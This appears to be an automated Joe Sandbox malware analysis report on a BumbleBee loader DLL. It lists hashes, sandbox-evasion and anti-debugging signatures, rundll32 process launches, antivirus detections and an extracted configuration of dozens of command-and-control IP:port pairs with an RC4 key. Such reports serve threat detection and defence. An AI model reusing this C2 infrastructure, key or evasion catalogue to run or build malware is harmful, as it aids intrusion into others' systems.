Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
o7m2se.dll

Overview

General Information

Sample Name:o7m2se.dll
Analysis ID:659464
MD5:cc9f20deaa66ffd5b96b727c2454e141
SHA1:3b90678ff567417851e8c9953effeda2969abc4d
SHA256:e6c6ad0411501c2d81863c0ecaf80ace8a5e9b6ce8329c5700890eb36991f6fb
Tags:exe
Infos:

Detection

BumbleBee
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected BumbleBee
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Contain functionality to detect virtual machines
Searches for specific processes (likely to inject)
C2 URLs / IPs found in malware configuration
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Sets debug register (to hijack the execution of another thread)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
AV process strings found (often used to terminate AV products)
Extensive use of GetProcAddress (often used to hide API calls)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Launches processes in debugging mode, may be used to hinder debugging
Found large amount of non-executed APIs
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll64.exe (PID: 6540 cmdline: loaddll64.exe "C:\Users\user\Desktop\o7m2se.dll" MD5: 4E8A40CAD6CCC047914E3A7830A2D8AA)
    • cmd.exe (PID: 6552 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",#1 MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • rundll32.exe (PID: 6572 cmdline: rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",#1 MD5: 73C519F050C20580F8A62C849D49215A)
        • WerFault.exe (PID: 6752 cmdline: C:\Windows\system32\WerFault.exe -u -p 6572 -s 324 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
    • rundll32.exe (PID: 6560 cmdline: rundll32.exe C:\Users\user\Desktop\o7m2se.dll,KInMQF MD5: 73C519F050C20580F8A62C849D49215A)
      • WerFault.exe (PID: 6744 cmdline: C:\Windows\system32\WerFault.exe -u -p 6560 -s 316 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
    • rundll32.exe (PID: 6796 cmdline: rundll32.exe C:\Users\user\Desktop\o7m2se.dll,KwNqBn2l9N MD5: 73C519F050C20580F8A62C849D49215A)
      • WerFault.exe (PID: 6880 cmdline: C:\Windows\system32\WerFault.exe -u -p 6796 -s 316 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
    • rundll32.exe (PID: 6960 cmdline: rundll32.exe C:\Users\user\Desktop\o7m2se.dll,LLBMPMUsqf MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 7064 cmdline: rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",KInMQF MD5: 73C519F050C20580F8A62C849D49215A)
      • WerFault.exe (PID: 4448 cmdline: C:\Windows\system32\WerFault.exe -u -p 7064 -s 316 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
    • rundll32.exe (PID: 7072 cmdline: rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",KwNqBn2l9N MD5: 73C519F050C20580F8A62C849D49215A)
      • WerFault.exe (PID: 3488 cmdline: C:\Windows\system32\WerFault.exe -u -p 7072 -s 316 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
      • WerFault.exe (PID: 6824 cmdline: C:\Windows\system32\WerFault.exe -u -p 7072 -s 316 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
    • rundll32.exe (PID: 7096 cmdline: rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",LLBMPMUsqf MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 7140 cmdline: rundll32.exe "C:\Users\user\Desktop\o7m2se.dll",SrNF6Da MD5: 73C519F050C20580F8A62C849D49215A)
      • WerFault.exe (PID: 1596 cmdline: C:\Windows\system32\WerFault.exe -u -p 7140 -s 316 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
      • WerFault.exe (PID: 6332 cmdline: C:\Windows\system32\WerFault.exe -u -p 7140 -s 316 MD5: 2AFFE478D86272288BBEF5A00BBEF6A0)
  • cleanup

Malware Configuration

Threatname: BumbleBee

{"C2 url": ["146.19.173.184:443", "41.15.71.157:274", "66.9.9.138:154", "36.201.196.202:367", "173.200.61.240:100", "116.241.116.41:410", "242.232.106.206:162", "10.195.46.61:489", "249.112.226.98:243", "130.242.219.205:423", "154.56.0.113:443", "179.5.59.188:228", "217.246.42.10:346", "169.197.227.201:474", "231.228.102.246:186", "185.165.82.120:182", "74.230.15.244:376", "94.88.121.46:403", "120.181.249.142:177", "138.141.158.45:217", "128.79.29.175:298", "104.168.200.192:443", "196.168.84.24:372", "143.27.231.233:335", "133.99.126.202:263", "222.202.140.206:438", "117.172.191.115:471", "158.208.5.127:269", "218.155.13.204:130", "219.110.187.248:435", "209.244.102.105:112", "23.19.58.212:443", "4.177.13.86:289", "204.223.28.129:424", "246.134.183.74:364", "165.132.190.127:368", "89.159.155.176:455", "185.69.113.39:124", "47.26.53.19:195", "41.70.42.112:452", "74.219.241.225:481", "66.15.189.146:122", "28.23.200.103:366", "159.248.192.111:424", "170.88.0.154:120", "79.196.23.192:106", "146.70.106.76:443", "249.57.205.117:166", "62.82.188.190:234", "221.131.148.148:357", "206.245.228.10:133", "51.68.146.186:443", "118.89.112.82:338", "116.205.234.96:247", "205.160.222.15:274", "191.190.49.225:191"], "RC4 Key": "iKInPE9WrB"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_BumbleBeeYara detected BumbleBeeJoe Security
    0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_BumbleBeeYara detected BumbleBeeJoe Security

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      19.2.rundll32.exe.285c8050000.2.raw.unpackJoeSecurity_BumbleBeeYara detected BumbleBeeJoe Security
        14.2.rundll32.exe.21520580000.3.unpackJoeSecurity_BumbleBeeYara detected BumbleBeeJoe Security
          19.2.rundll32.exe.285c8050000.2.unpackJoeSecurity_BumbleBeeYara detected BumbleBeeJoe Security
            14.2.rundll32.exe.21520580000.3.raw.unpackJoeSecurity_BumbleBeeYara detected BumbleBeeJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Snort Signatures

              No Snort rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: 117.172.191.115:471Avira URL Cloud: Label: malware
              Source: 23.19.58.212:443Avira URL Cloud: Label: malware
              Source: 169.197.227.201:474Avira URL Cloud: Label: malware
              Source: 36.201.196.202:367Avira URL Cloud: Label: malware
              Source: 89.159.155.176:455Avira URL Cloud: Label: malware
              Source: 74.230.15.244:376Avira URL Cloud: Label: malware
              Source: 154.56.0.113:443Avira URL Cloud: Label: malware
              Source: 28.23.200.103:366Avira URL Cloud: Label: malware
              Source: 4.177.13.86:289Avira URL Cloud: Label: malware
              Source: 116.241.116.41:410Avira URL Cloud: Label: malware
              Source: 66.15.189.146:122Avira URL Cloud: Label: malware
              Source: 104.168.200.192:443Avira URL Cloud: Label: malware
              Source: 133.99.126.202:263Avira URL Cloud: Label: malware
              Source: 196.168.84.24:372Avira URL Cloud: Label: malware
              Source: 222.202.140.206:438Avira URL Cloud: Label: malware
              Source: 204.223.28.129:424Avira URL Cloud: Label: malware
              Source: 41.70.42.112:452Avira URL Cloud: Label: malware
              Source: 74.219.241.225:481Avira URL Cloud: Label: malware
              Source: 221.131.148.148:357Avira URL Cloud: Label: malware
              Source: 143.27.231.233:335Avira URL Cloud: Label: malware
              Source: 128.79.29.175:298Avira URL Cloud: Label: malware
              Source: 170.88.0.154:120Avira URL Cloud: Label: malware
              Source: 206.245.228.10:133Avira URL Cloud: Label: malware
              Source: 130.242.219.205:423Avira URL Cloud: Label: malware
              Source: 218.155.13.204:130Avira URL Cloud: Label: malware
              Source: 185.69.113.39:124Avira URL Cloud: Label: malware
              Source: 205.160.222.15:274Avira URL Cloud: Label: malware
              Source: 165.132.190.127:368Avira URL Cloud: Label: malware
              Source: 120.181.249.142:177Avira URL Cloud: Label: malware
              Source: 116.205.234.96:247Avira URL Cloud: Label: malware
              Source: 209.244.102.105:112Avira URL Cloud: Label: malware
              Source: 173.200.61.240:100Avira URL Cloud: Label: malware
              Source: 159.248.192.111:424Avira URL Cloud: Label: malware
              Source: 94.88.121.46:403Avira URL Cloud: Label: malware
              Source: 217.246.42.10:346Avira URL Cloud: Label: malware
              Source: 118.89.112.82:338Avira URL Cloud: Label: malware
              Source: 219.110.187.248:435Avira URL Cloud: Label: malware
              Source: 146.19.173.184:443Avira URL Cloud: Label: malware
              Source: 79.196.23.192:106Avira URL Cloud: Label: malware
              Multi AV Scanner detection for domain / URL
              Source: 23.19.58.212:443Virustotal: Detection: 8%Perma Link
              Source: 19.2.rundll32.exe.285c8050000.2.raw.unpackMalware Configuration Extractor: BumbleBee {"C2 url": ["146.19.173.184:443", "41.15.71.157:274", "66.9.9.138:154", "36.201.196.202:367", "173.200.61.240:100", "116.241.116.41:410", "242.232.106.206:162", "10.195.46.61:489", "249.112.226.98:243", "130.242.219.205:423", "154.56.0.113:443", "179.5.59.188:228", "217.246.42.10:346", "169.197.227.201:474", "231.228.102.246:186", "185.165.82.120:182", "74.230.15.244:376", "94.88.121.46:403", "120.181.249.142:177", "138.141.158.45:217", "128.79.29.175:298", "104.168.200.192:443", "196.168.84.24:372", "143.27.231.233:335", "133.99.126.202:263", "222.202.140.206:438", "117.172.191.115:471", "158.208.5.127:269", "218.155.13.204:130", "219.110.187.248:435", "209.244.102.105:112", "23.19.58.212:443", "4.177.13.86:289", "204.223.28.129:424", "246.134.183.74:364", "165.132.190.127:368", "89.159.155.176:455", "185.69.113.39:124", "47.26.53.19:195", "41.70.42.112:452", "74.219.241.225:481", "66.15.189.146:122", "28.23.200.103:366", "159.248.192.111:424", "170.88.0.154:120", "79.196.23.192:106", "146.70.106.76:443", "249.57.205.117:166", "62.82.188.190:234", "221.131.148.148:357", "206.245.228.10:133", "51.68.146.186:443", "118.89.112.82:338", "116.205.234.96:247", "205.160.222.15:274", "191.190.49.225:191"], "RC4 Key": "iKInPE9WrB"}
              Source: Binary string: UxTheme.pdb source: WerFault.exe, 00000017.00000003.521546390.000001CE21217000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000003.522351148.000001CE21217000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521967763.0000018686D87000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.522361320.0000018686D87000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524163906.000001F5F3FB7000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524067138.000001F5F3FB7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: gdi32.pdb source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000003.522255145.000001CE21214000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.522302209.0000018686D84000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524155590.000001F5F3FB4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 32.pdb source: WerFault.exe, 00000019.00000003.523380302.000001F5F180D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: bcryptprimitives.pdb8 source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: sechost.pdb source: WerFault.exe, 00000017.00000003.521546390.000001CE21217000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000003.522351148.000001CE21217000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521967763.0000018686D87000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.522361320.0000018686D87000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524163906.000001F5F3FB7000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524067138.000001F5F3FB7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: rpcrt4.pdb source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: kernelbase.pdb8 source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdb8 source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: shcore.pdb8 source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: combase.pdb8 source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: win32u.pdb8 source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000003.522255145.000001CE21214000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.522302209.0000018686D84000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524155590.000001F5F3FB4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: shcore.pdb source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msctf.pdb source: WerFault.exe, 00000017.00000003.521546390.000001CE21217000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000003.522351148.000001CE21217000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521967763.0000018686D87000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.522361320.0000018686D87000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524163906.000001F5F3FB7000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524067138.000001F5F3FB7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: .pdbj source: WerFault.exe, 00000018.00000002.540677805.0000018684311000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: .pdb& source: WerFault.exe, 00000018.00000002.540677805.0000018684311000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: gdi32full.pdb8 source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000003.522255145.000001CE21214000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.522302209.0000018686D84000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524155590.000001F5F3FB4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: .pdb' source: WerFault.exe, 00000019.00000002.540787106.000001F5F17F2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: gdi32.pdb8 source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000003.522255145.000001CE21214000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.522302209.0000018686D84000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524155590.000001F5F3FB4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: user32.pdb source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000017.00000003.522242157.000001CE21210000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.522247900.0000018686D80000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524143635.000001F5F3FB0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: rundll32.pdb8 source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: rpcrt4.pdb8 source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: imagehlp.pdb8 source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows32.pdb' source: WerFault.exe, 00000019.00000003.523380302.000001F5F180D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ntdll.pdb source: WerFault.exe, 00000017.00000003.511558759.000001CE2070A000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000003.514011681.000001CE2070A000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.516424452.00000186861AA000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.514612330.00000186861AA000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.516159154.000001F5F353A000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.512599113.000001F5F353A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: combase.pdb source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: kernel32.pdb source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000003.513682177.000001CE20710000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000003.511592812.000001CE20710000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.514620485.00000186861B0000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.516093975.00000186861B0000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.515614989.000001F5F3540000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.512632464.000001F5F3540000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: rundll32.pdb source: WerFault.exe, 00000017.00000003.511506037.000001CE20704000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000002.543116730.000001CE20B07000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000002.541171177.00000186865A7000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.514587771.00000186861A4000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000002.542096728.000001F5F3937000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.512231733.000001F5F3534000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: msvcrt.pdb8 source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000017.00000003.521546390.000001CE21217000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000003.522351148.000001CE21217000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521967763.0000018686D87000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.522361320.0000018686D87000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524163906.000001F5F3FB7000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524067138.000001F5F3FB7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ntdll.pdb8 source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: kernel32.pdb8 source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: win32u.pdb source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000003.522255145.000001CE21214000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.522302209.0000018686D84000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524155590.000001F5F3FB4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: gdi32full.pdb source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000003.522255145.000001CE21214000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.522302209.0000018686D84000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524155590.000001F5F3FB4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: user32.pdb8 source: WerFault.exe, 00000017.00000003.521314444.000001CE21211000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521955608.0000018686D81000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524051068.000001F5F3FB1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000017.00000003.521546390.000001CE21217000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000003.522351148.000001CE21217000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.521967763.0000018686D87000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.522361320.0000018686D87000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524163906.000001F5F3FB7000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.524067138.000001F5F3FB7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ntdll.pdb0 source: WerFault.exe, 00000017.00000003.511558759.000001CE2070A000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000017.00000003.514011681.000001CE2070A000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.516424452.00000186861AA000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000018.00000003.514612330.00000186861AA000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.516159154.000001F5F353A000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000019.00000003.512599113.000001F5F353A000.00000004.00000020.00020000.00000000.sdmp
